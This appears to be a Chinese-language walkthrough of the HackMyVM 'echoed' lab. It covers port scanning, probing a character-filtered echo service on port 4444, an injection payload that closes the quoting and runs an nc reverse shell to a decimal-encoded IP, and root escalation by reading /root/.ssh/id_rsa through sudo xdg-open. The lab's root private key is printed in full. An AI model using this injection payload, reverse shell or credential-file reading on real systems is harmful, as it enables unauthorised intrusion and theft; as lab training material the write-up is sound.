hack-my-vm-echoed

hack-my-vm-echoed

端口扫描

1
2
3
4
5
6
7
8
9
10
kali@kali [~] ➜  sudo nmap -sT -p- --min-rate 1000 192.168.178.173                                                                               [21:27:48]
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-03-21 21:29 CST
Nmap scan report for 192.168.178.173
Host is up (0.0022s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
4444/tcp open  krb524
MAC Address: 08:00:27:EC:6C:26 (Oracle VirtualBox virtual NIC)

开放了三个端口

端口渗透

1
2
kali@kali [~] ➜  curl http://192.168.178.173                                                                                                     [21:31:49]
If you dont see Command: prompt in the XXXX port, please restart the VM.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
kali@kali [~] ➜  gobuster dir --wordlist=/usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://192.168.178.173                  [21:32:21]
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.178.173
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220561 / 220562 (100.00%)
===============================================================
Finished
===============================================================

web端口估计是啥都没有了,提示很明显的,肯定和4444端口有关,我们先监听一下

1
2
3
kali@kali [~] ➜  nc 192.168.178.173 4444                                                                                                         [22:02:03]
Command:id
Found illegal char.Command:

看来是过滤了一些字符的,让特定字符无法输入,接下里我把键盘里面的字符几乎都敲了一边进行测试,发现如下

1
2
3
Found illegal char.Command:y
Executing:echo "y"
y

首先,执行的命令是echo “y”,这种形式的。将我们交互的所有代码写入x.txt

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
kali@kali [~] ➜  cat x.txt                                                                                                                       [21:35:37]
Command:id
Found illegal char.Command:q
Found illegal char.Command:w
Executing:echo "w"
w
Command:e
Executing:echo "e"
e
Command:r
Found illegal char.Command:t
Found illegal char.Command:y
Executing:echo "y"
y
Command:u
Found illegal char.Command:i
Executing:echo "i"
i
Command:o
Found illegal char.Command:p
Found illegal char.Command:[
Executing:echo "["
[
Command:]
Executing:echo "]"
]
Command:a
Executing:echo "a"
a
Command:s
Executing:echo "s"
s
Command:d
Found illegal char.Command:f
Executing:echo "f"
f
Command:g
Found illegal char.Command:h
Executing:echo "h"
h
Command:j
Found illegal char.Command:k
Found illegal char.Command:l
Found illegal char.Command:;
Executing:echo ";"
;
Command:'
Executing:echo "'"
'
Command:z
Executing:echo "z"
z
Command:x
Executing:echo "x"
x
Command:c
Executing:echo "c"
c
Command:v
Found illegal char.Command:b
Executing:echo "b"
b
Command:n
Executing:echo "n"
n
Command:m
Found illegal char.Command:,
Found illegal char.Command:.
Found illegal char.Command:/
Executing:echo "/"
/
Command:<
Executing:echo "<"
<
Command:>
Executing:echo ">"
>
Command:?
Found illegal char.Command::
Executing:echo ":"
:
Command:"
Command:{
Executing:echo "{"
{
Command:}
Executing:echo "}"
}
Command:1
Executing:echo "1"
1
Command:2
Executing:echo "2"
2
Command:3
Executing:echo "3"
3
Command:4
Executing:echo "4"
4
Command:5
Executing:echo "5"
5
Command:6
Executing:echo "6"
6
Command:7
Executing:echo "7"
7
Command:8
Executing:echo "8"
8
Command:9
Executing:echo "9"
9
Command:0
Executing:echo "0"
0
1
2
kali@kali [~] ➜  cat x.txt | awk '{if(length == 1){printf $0" "}}'                                                                               [22:04:40]
w e y i [ ] a s f h ; ' z x c b n / < > : { } 1 2 3 4 5 6 7 8 9 0

只测试了常用的字符,这里少了一个双引号,因为我们输入双引号,命令为echo “”” ,是不会输出任何东西的

bash可以,bin可以,nc可以,/可以,数字可以

由于.是不行的,我们反弹shell的ip地址肯定是有点的,所以要给ip地址处理,最简单的方式是转成数字

由于执行ehco “命令”的缘故,我们要进行闭合,echo “ {“;反弹shell;”} “,我们的命令因该是花括号里面的形式

1
Command:";nc -e /bin/bash 3232281229 8888;"

提权

1
2
3
4
5
6
7
charlie@echoed:~$ sudo -l
Matching Defaults entries for charlie on echoed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User charlie may run the following commands on echoed:
    (ALL : ALL) NOPASSWD: /usr/bin/xdg-open

问问gpt

1
2
3
4
5
xdg-open 会根据你当前的桌面环境(比如 GNOME、KDE、XFCE)调用相应的默认程序去打开:

文件(图片、PDF、文档等)
文件夹
URL(用默认浏览器打开)

能打开文件好像是

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
charlie@echoed:~$ sudo /usr/bin/xdg-open /root/.ssh/id_rsa
WARNING: terminal is not fully functional
/root/.ssh/id_rsa  (press RETURN)-----BEGIN OPENSSH PRIVATE KEY-----
b3BlbnNzaC1rZXktdjEAAAAABG5vbmUAAAAEbm9uZQAAAAAAAAABAAABFwAAAAdzc2gtcn
NhAAAAAwEAAQAAAQEA7EqTEqxQiI+A27hayef+XQLgE91eQQ94tyvsEFWvQiLtSUwHhCKn
TXARwWcCc5uWFhMTAqL8mFncfYLYvRG2PhiasUgi+kIVjWQZPp/CAu/AMQCeELd2giWoz/
w4xuiz/jVkUiZtB4OUfGFbwkMFi5wqRM5d6TIGUQinfGiwiutWSusQ7cpxLgbtGGuuJe5Z
BOXYk4WDZfV+o8DiqTn/DSyADeQoyTYO6qfkcFN2lgVlGdEYx7CF5MS+DT/+b5dBpQGcTj
jDj+KLckJkt7GZ0fbhpzToiBETTBBDqzgeeN04QmAOlOubbcIwnB33+PEaWFtQMatGZQYC
ks9KBQv+lQAAA8hYRFboWERW6AAAAAdzc2gtcnNhAAABAQDsSpMSrFCIj4DbuFrJ5/5dAu
AT3V5BD3i3K+wQVa9CIu1JTAeEIqdNcBHBZwJzm5YWExMCovyYWdx9gti9EbY+GJqxSCL6
QhWNZBk+n8IC78AxAJ4Qt3aCJajP/DjG6LP+NWRSJm0Hg5R8YVvCQwWLnCpEzl3pMgZRCK
d8aLCK61ZK6xDtynEuBu0Ya64l7lkE5diThYNl9X6jwOKpOf8NLIAN5CjJNg7qp+RwU3aW
BWUZ0RjHsIXkxL4NP/5vl0GlAZxOOMOP4otyQmS3sZnR9uGnNOiIERNMEEOrOB543ThCYA
6U65ttwjCcHff48RpYW1Axq0ZlBgKSz0oFC/6VAAAAAwEAAQAAAQEAzdQoSRvRCyP2G297
pmVwLZVTm/o5IHNZtDWObKw2/mVuTWrtIS0Oj2YQEWipugrNsmzrImDXp96fMrXIFupW1c
CY/9TWoyjtnTyUwPhpCCXQRN9E0Ur+8F/drU8IJjyOjeH0gZr3XpQ/xBkK1S2MpxBhwY4C
QCBTYEMpojWPk3HAMbQNFddsPAPfLFk+4R6GPUKrUtOzzf/Kdwpn+PTFRjvytPfS7pbPAx
YHyM42rSNhy6jQlN1Iiu+EwUm1MBl9bTk5A6Jk3fvQWnBXoPZfjbgE/Kk2RZXZNW1a6MBG
URR5zjhWfu0NvJDm8z227UgwV7fXsUMyvBbeYFJHOuygAQAAAIEA6Inpgcu76BJkYcgTJD
PEwbtyyc/PE9vFYIwBENuUlz6jXT1TuhZ1FyY+pidQ607l0E+M7zwGrMb+PQP8l7KpMkbX
Y8IQydqs/XzNziO9RnQusXFcVCbsAKmYsLeCkbzOn4yWitA5cpgLs/bXrqGs2dFE/d8ifi
mLodRZj6/vLGwAAACBAPlu5m8XoaGK1XkF7Vlik4YoCNPnavRGB91fJg/M7M5YKKR7Y1ll
jmNX4TIIj+U5CuvIBf6TVS1fwn95ANv2o8oxVG7e4AHZpt3GQtP2yDLiHshzsj0W6NzzeI
dB2BClQgvukjzremccz8rHV3L9nYr1LYF/Rs6GgvsD72AZzgNJAAAAgQDygxopioQQ/Dup
/root/.ssh/id_rsaz6hTWng1LXgZ0EUBMqN5tCcGgTHvAeykiWpjl/zrK5QjDmjhKzYaHPBI/sUdgVA8o2R8ne
:hbS9N2ogWiJAF/XaU5behAdg1lTkfk6xNpF/1CVuK2gItW7yF1AGLMPLhD8nVlyx1429Ln
:eysx2HEd+7b7p0dU7QAAAAtyb290QGVjaG9lZAECAwQFBg==
:-----END OPENSSH PRIVATE KEY-----

后面有点乱,得稍微整理一下

1
2
3
4
5
6
7
8
9
10
11
kali@kali [~] ➜  ssh -i y root@192.168.178.173                                                                                                   [22:36:02]
Linux echoed 4.19.0-12-amd64 #1 SMP Debian 4.19.152-1 (2020-10-18) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Dec 17 02:25:52 2020
root@echoed:~#